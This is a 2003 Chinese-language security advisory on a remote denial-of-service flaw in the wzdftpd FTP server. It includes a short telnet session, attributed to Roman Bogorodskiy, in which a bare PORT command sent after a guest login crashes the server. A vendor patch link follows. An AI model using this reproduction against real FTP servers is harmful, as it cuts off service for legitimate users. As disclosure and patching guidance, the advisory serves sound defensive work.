WZDFTPD畸形PORT命令远程拒绝服务攻击漏洞
发布日期:2003-06-27
更新日期:2003-07-04
受影响系统:wzdftpd wzdftpd
描述:
BUGTRAQ ID:
8055
wzdftpd是一款可移植,模块化的FTP服务器,支持SSL、Winsock、多线程等。
wzdftpd没有正确处理畸形PORT命令,远程攻击者可以利用这个漏洞对FTP服务进行拒绝服务攻击。
当接收到不完整或畸形FTP PORT命令请求时,服务器会崩溃,停止对所有授权用户的响应。
<*来源:Roman Bogorodskiy (
bogorodskiy@inbox.ru)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=105674242105302&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Roman Bogorodskiy <
bogorodskiy@inbox.ru>提供了如下的测试方法:
$> telnet 127.0.0.1 21
Trying 127.0.0.1...
Connected to localhost.novel.ru.
Escape character is '^]'.
220 wzd server ready.
USER guest
331 User guest okay, need password.
PASS any
230 User logged in, proceed.
PORT
Connection closed by foreign host.
$> telnet 127.0.0.1 21
Trying 127.0.0.1...
telnet: connect to address 127.0.0.1: Connection refused
telnet: Unable to connect to remote host
建议:
厂商补丁:
wzdftpd
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.wzdftpd.net/download.html浏览次数:2974
严重程度:0(网友投票)